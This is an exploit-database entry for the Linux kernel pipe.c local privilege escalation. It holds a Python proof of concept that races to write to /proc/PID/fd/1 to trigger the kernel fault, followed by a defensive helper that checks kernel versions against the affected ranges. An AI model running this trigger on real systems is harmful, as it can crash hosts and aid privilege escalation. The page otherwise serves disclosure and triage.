Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privilege Escalation

###############################
# EDB-ID: 9844
# CVE-ID: ()
# Title: Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privilege Escalation
# Author: Matthew Bergin
# Published: 2009-11-05
###############################
# This is a PoC based on the PoC released by Earl Chew
# Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
# PoC by Matthew Bergin
# Bugtraq ID: 36901

import os
import time
import random

# Loop forever: spawn a one-second sleeper, then hunt for its PID.
while True:
    os.system("sleep 1")
    while True:
        time.sleep(random.random())  # random float in [0.0, 1.0), varies the timing of the race
        # os.system() only returns the exit status, so read the output through a pipe instead.
        # In `ps -efl` output the PID is the fourth column (F S UID PID ...).
        pid = os.popen("ps -efl | grep 'sleep 1' | grep -v grep | { read F S UID PID REST ; echo $PID; }").read().strip()
        if not pid:  # need an active pid, race condition applies
            print("[+] Didn't grab PID, got: '" + pid + "' -- Retrying...")
            continue
        print("[+] PID: " + pid)
        loc = "echo n > /proc/" + pid + "/fd/1"
        os.system(loc)  # triggers the fault, runs via sh
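The only hard facts the advisory gives a defender are the affected version ranges in its title (2.4.1 through 2.4.37, and 2.6.1 through 2.6.32-rc5). The following triage helper is an added example written for this page; it is not part of the PoC or of Earl Chew's or Matthew Bergin's code. It parses a `uname -r` style release string, including the "-rcN" suffix that matters for the 2.6.32-rc5 upper bound, and reports whether the release falls inside either range. The range bounds come from the advisory title; the function and variable names are the example's own.

```python
import platform
import re

# Affected ranges, inclusive, exactly as stated in the advisory title:
# 2.4.1 - 2.4.37 and 2.6.1 - 2.6.32-rc5.
AFFECTED_RANGES = [
    ("2.4.1", "2.4.37"),
    ("2.6.1", "2.6.32-rc5"),
]

# major.minor[.patch][-rcN]; anything after that (distro suffixes such as
# "-194.el5" or "-generic", extra sublevels) is ignored.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-rc(\d+))?")


def parse_kernel_version(release):
    """Turn a kernel release string into a sortable tuple.

    Returns (major, minor, patch, stage, rc) where stage is 0 for a release
    candidate and 1 for a final release, so that 2.6.32-rc5 sorts before
    2.6.32 and 2.6.32-rc6 sorts after 2.6.32-rc5.
    """
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    major, minor, patch, rc = m.groups()
    patch = int(patch) if patch is not None else 0
    if rc is None:
        return (int(major), int(minor), patch, 1, 0)
    return (int(major), int(minor), patch, 0, int(rc))


def is_affected(release):
    """True if the release falls inside one of the advisory's version ranges."""
    v = parse_kernel_version(release)
    for low, high in AFFECTED_RANGES:
        if parse_kernel_version(low) <= v <= parse_kernel_version(high):
            return True
    return False


def running_kernel_affected():
    """Apply the check to the kernel this script is running on (Linux only)."""
    if platform.system() != "Linux":
        return False
    return is_affected(platform.release())


if __name__ == "__main__":
    # Constructed sample release strings, chosen to sit on and around the range edges.
    for sample in ("2.6.32-rc5", "2.6.32", "2.6.32-rc6", "2.4.37", "2.4.38", "2.6.18-194.el5"):
        print("%-16s affected by advertised range: %s" % (sample, is_affected(sample)))
    print("running kernel %s: %s" % (platform.release(), running_kernel_affected()))
```

A version-range match is a first-pass triage signal only: distribution kernels such as a "2.6.18-194.el5" build carry backported fixes that the upstream version number does not reveal, so a hit here should be confirmed against the vendor's own advisory before a host is treated as vulnerable.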
